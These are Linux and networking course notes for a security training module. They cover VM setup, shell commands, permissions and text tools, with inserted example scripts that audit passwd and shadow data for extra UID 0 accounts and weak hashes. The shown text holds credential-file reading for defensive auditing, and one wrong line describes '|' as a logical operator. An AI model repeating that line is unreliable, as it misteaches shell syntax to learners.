Network Research
NX201
Table of Contents
Module 1: Virtualization
    Virtualization
        Installing Workstation on a Windows Host
        Installing Kali Linux
        Bridged vs. NAT
Module 2: Introduction to Linux
    Working with Linux
        Linux Directories
        Linux and Basic Commands
        Operators in Linux
        Commands in APT package (Advanced Package Tool)
        Linux Users
        File Permissions in Linux
Module 3: Text Manipulation
        Loops - For and While
        Bash Scripting and Automation
        Practical Lab
Module 4: Protocols and Services
    TCP/IP and OSI Model
        TCP/IP Model
        Using the Internet - Basic Concepts
        Remote Connection Protocols
        IPv4
    Protocols and Services
        DNS
        Important Protocols
        Introduction to Scanning
        Scanning with Nmap
        Scanning with Shodan
        Brute-Force
        Offline Brute Force: Shadow file
        Online Brute-Force: Hydra
        Practical Lab
Module 5: Diving into Packets
    Wireshark
        Non-Secure and Secure Packets
        Filtering and Parsing
        Extracting Objects
        Practical Lab
Module 6: Windows Network Tools
Module 7: Local Network Attacks
        MiTM
        LLMNR Attacks
        Practical Lab
    Cyber Attack Practice
        Backdooring
        Practical Lab
Module 1: Virtualization
Virtualization
Installing Workstation on a Windows Host
Log on to the Microsoft Windows host as an administrator. If installing from a CD, choose Run
from the Start menu and enter D:\setup.exe, where D: is the drive letter of the CD-ROM drive. If
installing from a downloaded file, choose Run from the Start menu, browse to the directory where
you saved the installer, and run it (the filename is VMwareWorkstation.exe). Click Next to dismiss
the welcome dialog box, then acknowledge the end-user license agreement.
Select "I accept the terms in the License Agreement", then click Next. Choose the directory in
which to install VMware Workstation. To install it in a directory other than the default, click
Change and browse to the directory of choice; if it does not exist, the installer creates it. Click
Next. On the User Experience Settings page, choose whether to check for updates and press Next.
Application Shortcuts preference. Select where to place the shortcuts on the system.
Click Install to begin the installation.
Click Finish to complete the installation process.
Launch VMware Workstation. Double click on the icon on the desktop to launch the application.
Installing Kali Linux
Click file -> New virtual machine or Create a New Virtual Machine.
Select Custom.
Choose the virtual machine hardware compatibility. Selecting the Workstation 14.x format keeps the
VM compatible with older Workstation versions if it is ever migrated.
Select the installer disk image (ISO) file for the operating system installation, then click Next.
Select Linux as a Guest operating system and click Next.
Specify the VM name and location, or leave it default.
Specify the number of processors and the number of cores per processor for this virtual machine.
One CPU is enough for Kali Linux.
Give the Kali Linux VM 2 GB of memory.
Select Network type; choose NAT.
Select a disk. Click Create a new virtual disk and then click Next.
Select Store virtual disk as a single file if there are no limitations to the file system.
Specify where you want to store the virtual disk file, and click Next.
Select Customize hardware if necessary, and click Finish to create the VM.
Bridged vs. NAT
In a bridged network, the host's network adapter connects the virtual machine to the local network
as if it were another physical device. The virtual machine receives its own IP address from the
DHCP server of the local network, so every other device on the LAN can reach it directly.

NAT (Network Address Translation) places the virtual machines in a separate, private network behind
the host. The virtual machines still have access to the outside network, but all their traffic
leaves the host masked with the host's own IP address, and nothing outside can initiate a
connection to a VM unless a port forward is configured.

Host-only, as its name suggests, connects the virtual machines only to the host (and to each other,
when they sit on the same host-only network); they have no route to the physical LAN or the
internet. This is the safest setting for labs that run malware or attack tools.

Category          Bridged network   NAT network
VM -> Host        +                 +
VM <- Host        +                 only with port forward
VM1 <-> VM2       +                 +
VM -> Internet    +                 +
VM <- Internet    +                 only with port forward
Change the connection type from NAT to Bridged in the VM's Settings. A bridged connection attaches
the VM directly to the physical network, whereas NAT puts it in a new subnet shared with the VM
host and masks its traffic behind the host's IP address.
After the change, the VM's IP address is 192.168.1.234, an address on the physical network.
Changing back to a NAT connection.
Checking the internal IP address in the Linux machine after switching back to NAT: the internal IP
address is 192.168.221.172, on a new sub-network shared with the VM host.
Take a snapshot of the system by navigating to VM -> Snapshot -> Take Snapshot, or by clicking the
snapshot icon. A snapshot is a quick backup of the VM's state; take one before every lab so that a
broken or compromised machine can be rolled back in seconds.
The new IP address is 192.168.172.129.
Module 2: Introduction to Linux
Working with Linux
The terminal is the window you get when you open the command-line interpreter. Inside the terminal
runs a shell, the program that reads and executes the commands you type. In Kali Linux the default
shell is bash (zsh in recent releases), and other interpreters such as python can be started from
it.
Shell
The shell is the command interpreter of an operating system such as Unix or GNU/Linux; it is a
program that executes other programs. It gives the user of a Unix/GNU Linux system an interface
to run commands and utilities/tools with input data. When the shell has finished executing a
program, the program's output goes to the standard output device, normally the screen.
The Terminal-Emulator Concept
A terminal emulator is a graphical application that emulates a text terminal; the shell runs
inside it, and commands and tools are launched from there within the graphical environment. Each
distribution has its own way of opening the terminal emulator.
Linux Directories
/ - The root directory of the system. Everything on Linux is located under it.
/bin - Essential commands (such as ping, ls, cp, and more) usable by all users.
/dev - Device files through which hardware and kernel drivers are accessed.
/var - Files expected to change in size and content while the system runs, such as log files.
/etc - System-wide settings and configuration files of the OS.
/lib - Shared libraries (code shared between applications so they can run) needed by the programs
in /bin and /sbin.
/boot - Files needed to start the system, such as the kernel and the bootloader.
/tmp - Temporary files; on most distributions the directory is cleared at every reboot, and files
left there are also removed after a number of days.
/usr - Installed applications, libraries and documentation for users.
/home - The personal directory of each user.
/srv - Data served by services running on the system.
Linux and Basic Commands
ls - displays the folder content. ls -a also shows hidden files (whose name starts with '.').
ls -l shows one line per file with its information, such as size, owner and permissions.
cd - change folder
cd .. - one folder back (the parent directory)
cd / - move to the root folder
cd ~ - move to the home folder of the current user
history - command history of the current user
passwd - change the user's password
touch - creates an empty file (or updates the timestamp of an existing one)
nano - text editor
cat Filename - displays the file content
cp A B - copies file A to location B
mv A B - moves file A to location B; it is also the way to rename a file
clear - clears the terminal screen
pwd - prints the full pathname of the current working directory
echo "hello" - prints 'hello'
rm -rf A - removes folder A and everything inside it, recursively and without asking for
confirmation; there is no undo
locate - searches for a file in the locate database; run updatedb first so the index is current
reboot - restarts the OS without confirmation or warning
poweroff - shuts down the OS without confirmation or warning
man A - the manual page (extended guide) for command "A"
uptime - shows how long the system has been running
whoami - shows the currently logged-in user
sort A - displays the lines of file "A" sorted alphabetically
head - displays the first ten lines of a file
tail - displays the last ten lines of a file
nl - displays the file content with numbered lines
ping - same as in Windows, used to check connectivity between computers
netstat -tapn - displays the active TCP connections and listening ports on the computer, with the
owning process
ifconfig - displays the local network card details, including the internal IP address
chmod - changes the permissions of a file. The course uses chmod 777 * to grant full permissions
to all users on every file in the current directory; that is convenient in a lab but dangerous on
a real system, because any local user can then modify or replace those files. Prefer the
narrowest mode that works.
grep - displays the lines where the desired text is found
Operators in Linux
Operators are placed after a command to save or filter its output, or to run more than one command
in one line.
>  saves the output into a file, replacing the file's current content if it exists
>> appends the output to the end of the file
&& executes the second command only if the first one succeeded (exit status 0)
;  executes the first command and then, in any case, the second command
|  pipeline: sends the output of the command before it as input to the command after it, for
example a filter such as grep
Commands in APT package (Advanced Package Tool)
apt-get update - refreshes the package index from the configured repositories; it installs nothing.
apt-get upgrade - upgrades the installed packages to the newest indexed versions.
apt-get dist-upgrade - upgrades the whole system, adding or removing packages when dependencies
changed.
apt-get install PACKAGE - installs a package.
apt-get remove PACKAGE - removes a package.
apt-cache show PACKAGE - displays the description of a package.
Installing, removing and upgrading packages requires root privileges, so these commands are
normally run with sudo. Before using apt-get, a download source must be configured; otherwise the
system does not know where to get files from. If needed, edit the file /etc/apt/sources.list (the
list of repositories the OS contacts for packages and updates) and add the relevant sources. Each
package has an entry in the index, and every apt-get update refreshes that index from the listed
repositories, so it is important to keep the sources current. Only add repositories you trust: apt
checks each repository's signature, and a repository you add can install anything on the system.
Linux Users
Linux is a multiuser operating system. Typical administration tasks in a multiuser environment are
creating new users, modifying existing users, and removing users. For ease of access management,
users are assigned to groups; creating, deleting, and changing groups is another common
administration task.
In a typical Linux system, ordinary users are not allowed to execute administrative commands. For
that we have the sudo command, which grants elevated privileges for a single command, temporarily
and in a controlled way. root is the administrator/superuser account with full privileges; it does
not need sudo to run administrator-only commands such as reboot. The sudoers file (/etc/sudoers)
lists the users and groups allowed to use sudo and what they may run. The sudo package ships with
a tool for editing the sudoers file safely: visudo, which locks the file while you edit it and
checks its syntax before saving, so a typo cannot lock every administrator out.
Understanding the sudoers file configuration
• Defaults env_reset - clears most environment variables when a command runs through sudo, so a
user cannot smuggle settings such as a modified PATH or LD_PRELOAD into a root process
• root ALL=(ALL) ALL - allows root to run any command on any host as any user
• %admin ALL=(ALL) ALL - allows anybody in the admin group to run any command as any user (a
password prompt still applies unless NOPASSWD is set)
User Commands
Add a user with the command adduser newuser. By default, a new user gets a new primary group with
the same name as the user.
A user can be given sudo privileges by adding them to the sudo group (or, less commonly, by a
dedicated entry in the sudoers file). To add a user to a supplementary group:
usermod -a -G <group> <username>
In this case: usermod -a -G sudo newuser
The -a (append) flag matters: usermod -G without -a replaces the user's existing supplementary
groups with the list given.
To set the user's primary group, use the -g flag (without -a, which only applies to -G):
usermod -g <group> newuser
To create a new group, use the command: groupadd <newgroup>
And to remove an existing group: groupdel <group>
Passwd File
The passwd file is located at /etc/passwd. It is a text file containing the attributes of each
user account on a Linux computer.
By default /etc/passwd is world-readable, that is, any user on the system can read it. It can be
read with a text editor or with a command such as cat, for example cat /etc/passwd.
/etc/passwd contains one entry per line for each user account on the system. The fields are
separated by a colon (:).
1. Username: the login name, between 1 and 32 characters long.
In this case: the username is root.
2. Password: an x indicates that the password hash is stored in the /etc/shadow file. An empty
field means the account has no password at all, which is something to look for when auditing a
system.
In this case: the password is stored in the shadow file.
3. User ID (UID): each user is assigned a numeric user ID. UID 0 is reserved for root; UIDs 1-99
are reserved for other predefined accounts, and UIDs 100-999 for system and administrative
accounts. Any account with UID 0 is root whatever its name, so a second UID 0 entry is a classic
backdoor.
In this case: since the user is root, the UID is 0.
4. Group ID (GID): the primary group ID (defined in /etc/group). As with the UID, GID 0 is
reserved for the root group.
In this case: the group is 0.
5. User ID Info: the comment (GECOS) field, for extra information about the user such as the full
name or phone number.
In this case: by default, it contains the username.
6. Home directory: the absolute path of the directory the user lands in at login. If this
directory does not exist, the user's directory becomes / (the root directory).
In this case: the user's home folder is /root.
7. Command/shell: the absolute path of the command or shell started at login, typically a shell
such as /bin/bash. System accounts usually have /usr/sbin/nologin or /bin/false here, so they
cannot log in interactively.
Shadow File
The /etc/shadow file stores the password hash of each account (a salted one-way hash, not the
password itself) together with password-ageing properties. Unlike /etc/passwd it is readable only
by root and the shadow group, which is why the hashes are kept here. The fields are separated by a
colon (:), and there is one entry per line for each user listed in /etc/passwd.
1. Username: the login username.
2. Password: the hashed password, in the format $type$salt$hash. The types in use on GNU/Linux
are:
a. $1$ is MD5-crypt (obsolete and fast to brute-force; it should no longer appear)
b. $2a$ is bcrypt (Blowfish-based)
c. $2y$ is bcrypt (Blowfish-based)
d. $5$ is SHA-256-crypt
e. $6$ is SHA-512-crypt
f. $y$ is yescrypt, the default on current Debian-based systems including Kali
A "*" or "!" in this field means the account is locked; an empty field means no password is
required.
3. Last password change: days since Jan 1, 1970 on which the password was last changed.
4. Minimum: the minimum number of days required between password changes; the user cannot change
the password again until that many days have passed.
5. Maximum: the maximum number of days the password is valid; after that the user is forced to
change it.
6. Warn: the number of days before expiry on which the user is warned that the password must be
changed.
7. Inactive: the number of days after the password expires before the account is disabled.
8. Expire: days since Jan 1, 1970 on which the account is disabled.
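The checks described above for the two files, as an added example that is not part of the course material: a short shell script that does the review an auditor would otherwise do by eye, run over constructed sample lines (the account names, hash strings and dates are made up for this example; to use it on a real host, replace the two variables with the contents of /etc/passwd and /etc/shadow, the latter of which requires root).

```shell
#!/bin/sh
# Added example (not from the course page). Audits /etc/passwd and /etc/shadow
# style data for the conditions a reviewer looks for. The sample lines below are
# constructed for this example; the hash values are placeholders, not real hashes.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor:x:0:0:toor:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob::1001:1001:Bob:/home/bob:/bin/bash'

SAMPLE_SHADOW='root:$6$saltsalt$hashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
backdoor:$1$abcd$oldhash:19000:0:99999:7:::
alice:$6$saltsalt$hashhash:19000:0:99999:7:::
bob::19000:0:99999:7:::'

# Field 3 of passwd is the UID. Any UID 0 entry other than root is a second root account.
extra_uid0_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Field 2 of passwd should be "x" (the hash lives in shadow); anything else is suspicious.
passwd_without_shadow_marker() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '$2 != "x" { print $1 }'
}

# Field 2 of shadow empty: the account can log in with no password at all.
# "*" or "!" means locked, which is expected for system accounts.
shadow_empty_password() {
    printf '%s\n' "$SAMPLE_SHADOW" | awk -F: '$2 == "" { print $1 }'
}

# A $1$ prefix is MD5-crypt, cheap to brute-force offline; those users need a reset.
shadow_md5_hashes() {
    printf '%s\n' "$SAMPLE_SHADOW" | awk -F: 'substr($2, 1, 3) == "$1$" { print $1 }'
}

# Field 7 of passwd is the login shell; nologin/false cannot log in interactively.
interactive_accounts() {
    printf '%s\n' "$SAMPLE_PASSWD" | awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' | paste -s -d ' ' -
}

audit() {
    echo "UID 0 accounts other than root:     $(extra_uid0_accounts)"
    echo "passwd entries without x marker:    $(passwd_without_shadow_marker)"
    echo "shadow entries with no password:    $(shadow_empty_password)"
    echo "shadow entries still using MD5:     $(shadow_md5_hashes)"
    echo "accounts with an interactive shell: $(interactive_accounts)"
}

audit
```

Each function is a single awk filter over one file, so the same checks can be pointed at a real system by replacing the printf with cat /etc/passwd or sudo cat /etc/shadow.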
File Permissions in Linux
Every file and directory in a Unix/Linux system has three classes of owner, each with its own
permissions.
User
The user is the owner of the file. By default, the person who created a file becomes its owner,
which is why "user" and "owner" are used interchangeably.
Group
A user group can contain multiple users. All users belonging to the group get the same access
permissions on the file. Suppose several people on a project need access to a file: instead of
assigning permissions to each user individually, add them all to a group and set the group
permission on the file. Only those group members (and the owner) can then read or modify it.
Other
Any other user who has access to the file: one who neither created it nor belongs to the group
that owns it. In practice this means everybody else, so setting permissions for "others" is
setting permissions for the world. To see the permissions of files in more detail, type ls -l.
Additionally, run the same command for a specific file with ls -l FILENAME.
-rw-r--r-- is the permission string of file.txt: the first character shows the type, and the
remaining nine are three rwx triplets for the owner, the group and others. The first '-' means
file.txt is a regular file; if it were a directory, a d would be displayed. The owner's triplet
rw- means the owner can:
• read the file
• write or edit the file
• not execute the file, since the execute position is set to '-'
Users, Group, Others
chmod
To change the permissions (mode) of a file, use the chmod command:
chmod <mode> file/folder
Each class of user can have different permissions on a file:
r - read
w - write
x - execute
Absolute (Numeric) Mode
Permission Type          Symbol   Numeric
Execute                  x        1
Write                    w        2
Execute + Write          x+w      1+2 = 3
Read                     r        4
Read + Execute           r+x      4+1 = 5
Read + Write             r+w      4+2 = 6
Read + Write + Execute   r+w+x    4+2+1 = 7
A three-digit octal number gives one such digit for the owner, the group and others, in that
order; for example, 640 is rw- for the owner, r-- for the group, and nothing for others.
Number   Permissions
1        --x
2        -w-
3        -wx
4        r--
5        r-x
6        rw-
7        rwx
Symbolic Mode
In absolute mode you set the permissions of all three classes at once. Use symbolic mode to modify
the permissions of a specific class; it uses operators to add, remove or set permissions.
Operator   Description
+          adds a permission to a file or directory
-          removes a permission
=          sets the permission exactly, overriding what was set before
User Denotations   Ownership
u                  user/owner
g                  group
o                  other
a                  all
Changing Ownership and Group
For changing the ownership of a file/directory, use the chown command.
To change the user and the group for a file or directory, use the command:
chown <user:group> filename
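An added example, not part of the course page, that exercises absolute and symbolic chmod on files in a scratch directory, reads the resulting mode back with ls, and then runs the check an auditor cares about after a careless chmod 777: listing the files that anyone on the system can modify. The file names are arbitrary and nothing outside the mktemp directory is touched; chown is left out because changing a file's owner needs root.

```shell
#!/bin/sh
# Added example (not from the course page): numeric and symbolic chmod, and an
# audit for world-writable files. All paths live in a scratch directory created here.

WORK=$(mktemp -d)
umask 022                     # new files start as rw-r--r-- (644)
touch "$WORK/secrets.txt" "$WORK/deploy.sh" "$WORK/notes.txt"

# First ten characters of ls -l: type flag plus rwx triplets for user, group, other.
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Absolute mode 640: rw- for the owner, r-- for the group, nothing for others.
set_private() {
    chmod 640 "$1" && mode_of "$1"
}

# The "chmod 777" habit from the command table: everyone can read, modify and execute.
set_world_writable() {
    chmod 777 "$1" && mode_of "$1"
}

# Symbolic mode: add execute for the owner only, then strip every right from others.
make_owner_script() {
    chmod u+x "$1" && chmod o= "$1" && mode_of "$1"
}

# Audit: regular files under a directory whose "other" write bit (octal 002) is set.
world_writable_files() {
    find "$1" -type f -perm -002 -exec basename {} \; | sort
}

set_private "$WORK/secrets.txt"         # -rw-r-----
set_world_writable "$WORK/notes.txt"    # -rwxrwxrwx
make_owner_script "$WORK/deploy.sh"     # -rwxr-----
echo "world-writable: $(world_writable_files "$WORK")"   # notes.txt
```

Remove the scratch directory with rm -rf "$WORK" when done. The same find, run from / with -xdev so it stays on one filesystem, is the quickest way to locate files a chmod 777 habit has left open on a real host.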
File Commands
cp - copies files and directories. Copying to a new name produces a renamed copy; the original
stays in place. A wildcard (such as *.txt) copies multiple files at once.
mv - moves files from one location to another, or renames them.
rm - deletes files.
cd - changes to the specified directory.
touch - creates an empty file.
pwd - prints the current directory.
ls - lists the files and directories in the current location.
mkdir - creates a directory.
Module 3: Text Manipulation
Grep
The grep command is a UNIX command-line utility used to find lines matching a pattern.
Grep Command-line Flags/Options
The grep command has a few key flags. Specify the -i flag for a case-insensitive match (capital
-I means something else: it skips binary files).
The "before" and "after" flags: by default, grep prints only the line that matched. Use the -A,
-B and -C flags to also see lines before or after it.
-A n   print n lines after the match
-B n   print n lines before the match
-C n   print n lines on both sides of the match
Awk
The awk command breaks each line of input passed to it into fields. By default, a field is a
string of consecutive characters delimited by whitespace, though the delimiter can be changed.
awk '{ print $3 }' file.txt, or equivalently cat file.txt | awk '{ print $3 }', prints the third
field of every line.
To use a custom delimiter, pass it with -F, and list several fields in the print statement to
filter multiple columns.
Sed
The sed command in UNIX performs operations such as searching, find and replace, insertion and
deletion. In a substitution such as s/world/earth/, the "s" specifies the substitution operation,
the "/" characters are delimiters, "world" is the search pattern, and "earth" is the replacement
string.
Word Count
wc prints the newline, word and byte counts for each FILE, and a total line if more than one FILE
is given.
-c   print the byte counts
-m   print the character counts
-l   print the newline counts
-w   print the word counts
Count the number of lines in the file using the -l flag.
Count the number of words using the -w flag.
Count the number of characters in the file with the -m flag.
Sort and Uniq
The UNIX commands sort and uniq order and manipulate data in text files. The sort command accepts
input from a text file or from standard input, sorts it line by line, and prints the result. By
default the sort is lexical, character by character (so "10" sorts before "9"); use -n for numeric
order and -r to reverse it.
Running the sort command.
The uniq command removes repeated lines. Because uniq only removes identical adjacent lines, it is
usually combined with sort so that non-adjacent duplicates are removed as well.
cat file.txt | sort -n | uniq -c
This combination sorts the input and then counts the repeated occurrences of each line.
Cut
The cut command in UNIX cuts out sections of each line of a file and writes the result to standard
output. Its basic use is selecting specific fields from the input; to choose a field, use the -f
flag.
Cut uses tab as its default field delimiter but can work with another delimiter given with the -d
option.
Using the cut command with the -d and -f flags together.
Head and Tail
The head command outputs the first part of a file, and the tail command outputs the last part. By
default, head and tail display the first or last ten lines of the file. To specify the number of
lines to display from the beginning or the end, use the -n flag.
At the Linux command line you often need to view files or portions of them, and you may need
tools that gather chunks of data or file statistics for troubleshooting or analysis. The
utilities in this section assist in all these activities.
Text Combining Commands
Putting small text files together, to view them on the screen or compare them, is often useful.
The commands covered here do that. paste merges the lines of files horizontally: each output line
consists of the corresponding lines of the files given as arguments, separated by tabs. cat
concatenates files one after the other and displays the whole text. Displaying the users file and
the password file side by side with paste, for example, glues them together like school glue: it
works, but the result is not necessarily pretty.
tr
tr stands for translate. It is a command-line utility that translates or deletes specific
characters. It supports a wide range of transformations and can be combined with pipes for more
advanced filtering.
Use tr to modify the output to a specific need.
Delete a single character or a range of characters with the -d flag.
Use the -s flag to squeeze repeated characters into one.
Translate the "." into a newline to split the text into lines.
Without flags, tr SET1 SET2 replaces each character of SET1 with the corresponding character of
SET2; the -t flag truncates SET1 to the length of SET2 first.
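One added example, not from the course page, that brings the tools of this module (cut, awk, sed, tr, sort, uniq, wc, head, paste) together on a constructed CSV export of accounts; every row in SAMPLE_CSV is made up for the example, and the column layout is an assumption of the example rather than any real tool's output.

```shell
#!/bin/sh
# Added example (not from the course page): the text-manipulation tools of this
# module applied to a constructed CSV export of accounts. All rows are made up.

SAMPLE_CSV='user,dept,shell,last_login
alice,eng,/bin/bash,2024-03-01
bob,ops,/bin/zsh,2023-11-15
carol,eng,/bin/bash,2024-02-20
dave,sales,/usr/sbin/nologin,never
erin,eng,/bin/bash,2023-05-02'

# Feed the data as a stream; tail -n +2 drops the header line.
rows() {
    printf '%s\n' "$SAMPLE_CSV" | tail -n +2
}

# wc -l counts newlines; tr -d strips the padding some wc versions print.
count_accounts() {
    rows | wc -l | tr -d ' '
}

# cut picks the shell column; sort | uniq -c counts each shell; sort -rn puts the
# most common first; awk reorders the "count shell" pair that uniq -c prints.
most_common_shell() {
    rows | cut -d, -f3 | sort | uniq -c | sort -rn | head -n 1 | awk '{ print $2, $1 }'
}

# awk with a custom delimiter and a condition on one column, printing another.
users_in_dept() {
    rows | awk -F, -v dept="$1" '$2 == dept { print $1 }' | paste -s -d ' ' -
}

# Accounts with no login in 2024 (or never): a regex anchored on the date column.
stale_accounts() {
    rows | awk -F, '$4 !~ /^2024/ { print $1 }' | paste -s -d ' ' -
}

# sed substitution: expand the department code; the delimiters are part of the
# pattern so an "eng" inside another field would not be touched.
rename_dept() {
    rows | sed 's/,eng,/,engineering,/'
}

# tr translates or deletes characters: here it deletes the dashes from the dates.
compact_dates() {
    rows | cut -d, -f4 | tr -d '-' | paste -s -d ' ' -
}

count_accounts                       # 5
most_common_shell                    # /bin/bash 3
users_in_dept eng                    # alice carol erin
stale_accounts                       # bob dave erin
rename_dept | grep -c engineering    # 3
compact_dates                        # 20240301 20231115 20240220 never 20230502
```

Each function is one pipeline, so any of them can be pasted on its own into a terminal with a real file in place of rows.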
Basic and Extended Regular Expressions
"A regular expression or regex … is a sequence of characters that define a search pattern."
In Bash, a regex is written as a single-line search pattern and is accepted by almost all basic
filtering commands, such as grep, awk and sed.
Regex in Grep
First of all, the name grep stands for "global regular expression print": grep checks whether the
input it receives matches a specified pattern. grep also supports extended regular expressions;
use the -E flag or the egrep command (the same thing, although egrep is deprecated in favour of
grep -E).
Grep - Anchor Matches
Anchors are special characters that specify where in the line a match must occur to be valid. The
first ones are "^" and "$". The "^" anchor matches lines that start with a particular pattern.
Use the syntax ^w to filter each string that begins with the letter "w".
In contrast, filter any string that ends with the letter "e" using the "$" anchor: e$.
Another useful special character is "*", a quantifier rather than an anchor: it matches the
previous character or expression repeated zero or more times.
Filter any string with zero or more repetitions of "ap" followed by "le".
Placing a group of characters within square brackets specifies that the position can be any one
character from the bracket group. The first form is "[abn]", meaning any one of the characters a,
b or n.
The second form is "[a-c]", meaning any character in the range a to c.
A great example of grouping is detecting IP addresses.
Then use the sort and uniq commands to collapse the repeated IP addresses.
Grep - Times
These expressions find a match that repeats a given number of times. The first is "\{n\}", which
matches the preceding item repeated exactly n times (with -E it is written {n}).
The grep command matched the number "1" repeated twice. Furthermore, the expression "\{n,m\}"
matches the preceding item repeated between n and m times.
Grep - Special Expressions
In grep, the '\' character (backslash) takes a special meaning when followed by certain ordinary
characters. \s, \S, \w and \W are GNU extensions that work in basic and extended mode; \d and \D
are Perl syntax and only work with grep -P.
"\s"   white space
"\S"   non-white space
"\d"   digit character (grep -P only)
"\D"   non-digit character (grep -P only)
"\w"   word character (letters, digits, underscore)
"\W"   non-word character (punctuation, spaces)
Regex in Awk, Sed, and Cut
Like grep, a few other commands support extended regular expressions. awk can filter on a pattern
like grep, and in addition can test a specific column. sed is also capable of pattern matching.
cut does not use regular expressions; it only selects fixed fields or character positions.
The grep anchors work the same way in awk and sed.
To filter any IP address starting with "172", use ^.
Or any IP address that ends with the number "2".
The awk command can also receive a range of numbers.
Special Character Classes
[[:alpha:]]   any alphabetical character, upper or lower case
[[:alnum:]]   0-9, A-Z, or a-z
[[:blank:]]   space or tab
[[:digit:]]   0 to 9
[[:lower:]]   a-z lower case
[[:print:]]   any printable character
[[:punct:]]   any punctuation character
[[:space:]]   any whitespace character: space, tab, NL, FF, VT, CR
[[:upper:]]   A-Z upper case
Streams, Redirection, and Pipes
Data streams are the raw material that command-line tools and Linux utilities use to receive and
send data.
Stdin (0) - the stream programs read their input from. Commands such as ls and dir take
command-line arguments and work without any stream input; others, such as grep with no file
argument, read stdin.
Stdout (1) - the stream programs write their normal output to. The best example is cat: given a
file, it prints the file's contents to stdout, which the user sees on the screen.
Stderr (2) - the stream programs use for error and diagnostic messages. By default it is printed
on the screen like stdout, but it is a separate stream, so errors can be redirected away from data
that another tool will parse.
Redirection
Redirection gives you a handy toolbox to accomplish tasks faster and improve productivity.
>    overwrite
>>   append
Save the ifconfig output into a file with >.
What happens when we use > again? The file content is overwritten; to add text to the end of the
file instead, use >>.
46 | P a g e
Pipes
A pipe is a form of redirection used in Linux and other Unix-like operating systems to send the output
of one command/program/process to another command/program/process for further processing. For
example, read a file's content and then pass it to one of the text manipulation tools we learned before.
The Linux pipe is the character: |
Search for IP addresses starting with 192.
The difference between | and ||
| - (condition 1 | condition 2): checks both cases even if case 1 is true
|| - (condition 1 || condition 2): does not bother to check the second case if the first one is true
Loops - For and While
Loops in Bash allow us to take a series of commands and re-run them until a condition is reached. They
are useful for automating repetitive tasks.
For
The first common loop is for. The for loop iterates over each item in a list and, for each one, performs
the given set of commands.
The for loop takes each item in the list (in order, one after the other), assigns that item as the value of
the variable var, executes the commands between do and done, then goes back to the top, grabs the
next item in the list and repeats. For example, use the output of the command ls as the list and then
echo var as it receives each line of the output.
The "for" command can also process a series of numbers.
While
The second typical loop is the while loop. As long as its condition is true, it keeps executing the lines
of code in its body.
Working with Logs
For this example, use the commands we spoke about earlier in this chapter and apply them to a basic
auth.log log file downloaded from the internet for educational purposes.
To parse the IP addresses, use regular expressions, since IPs have a repeating pattern.
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" auth.log.1
-E allows us to use extended regular expressions.
-o prints only the matching part of each line.
The number alternatives in each group (25[0-5], 2[0-4][0-9], [01]?[0-9][0-9]?) ensure that the matched
values fit an actual IP address template and do not exceed 255.
The same address appears several times, and we do not need the duplicates. Collapse the repeated
addresses and count them using the command uniq -c.
Now, each IP address shows up once, with a count of how often it occurred. Sort the list from the
smallest count to the largest using sort -n.
Now, with no duplicates, save the output to a new file.
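As an added example (not from the course material), the pipeline above run on a constructed auth.log-style file, with the extracted addresses also filtered through the ^ and $ anchors described in the regex section; the log lines, file names and function names are made up:

```shell
#!/bin/sh
# Added example (not from the course): the IP-extraction pipeline, run on a
# constructed auth.log-style file so the result can be checked offline, plus the
# ^ and $ anchors in awk from the regex section.

LOG_FILE=$(mktemp)
trap 'rm -f "$LOG_FILE" "$LOG_FILE.counts"' EXIT

# Constructed sample lines (not a real log); the last one carries a value that is
# not a valid address at all.
cat > "$LOG_FILE" <<'EOF'
Jan 10 10:01:02 host sshd[1201]: Failed password for invalid user admin from 192.168.1.55 port 51022 ssh2
Jan 10 10:01:05 host sshd[1203]: Failed password for root from 172.16.4.9 port 51030 ssh2
Jan 10 10:01:09 host sshd[1205]: Failed password for root from 172.16.4.9 port 51031 ssh2
Jan 10 10:02:11 host sshd[1210]: Accepted publickey for alice from 10.0.0.7 port 40112 ssh2
Jan 10 10:03:40 host sshd[1215]: Failed password for root from 172.16.4.9 port 51044 ssh2
Jan 10 10:04:02 host sshd[1220]: Invalid user test from 192.168.1.55 port 51102
Jan 10 10:05:00 host sshd[1225]: Connection closed by 999.1.1.1 port 2 [preauth]
EOF

# One octet: 25[0-5], 2[0-4][0-9] or [01]?[0-9][0-9]?, so nothing above 255 matches.
OCTET='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
IP_RE="$OCTET\\.$OCTET\\.$OCTET\\.$OCTET"

# extract_ips LOGFILE: -E for extended regex, -o for the matching part only.
# -w requires a whole-word match; without it, "999.1.1.1" would yield a bogus
# "99.1.1.1", because the pattern can start matching in the middle of 999.
extract_ips() {
    grep -E -o -w "$IP_RE" "$1"
}

# count_ips LOGFILE: sort first, because uniq -c only merges adjacent duplicates,
# then sort -n to order by the count; awk normalises uniq's padded count column.
count_ips() {
    extract_ips "$1" | sort | uniq -c | sort -n | awk '{print $1, $2}'
}

# unique_ips_matching LOGFILE PATTERN: the anchors work in awk as in grep, so
# '^172' keeps addresses starting with 172 and '5$' those ending with 5.
unique_ips_matching() {
    extract_ips "$1" | sort -u | awk -v pat="$2" '$0 ~ pat'
}

count_ips "$LOG_FILE" > "$LOG_FILE.counts"   # save the de-duplicated list
cat "$LOG_FILE.counts"
unique_ips_matching "$LOG_FILE" '^172'
```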
Bash Scripting and Automation
Bash (Bourne Again Shell) is a command shell that exists primarily in Linux operating systems. The shell
scripting language is a fully-fledged programming language in itself: it can define variables and
functions and conditionally execute shell commands.
Start by creating an empty file for the first bash script by running nano firstscript.sh
Use a "Shebang" to make full use of the shell's features and ensure that the intended shell interprets
the commands. The "Shebang" (or the "bang line") is the first line of any bash script, and it looks as
follows:
#!interpreter [arguments]
Interpreter is the full path to a binary file (e.g., /bin/sh, /bin/bash), and the arguments are optional.
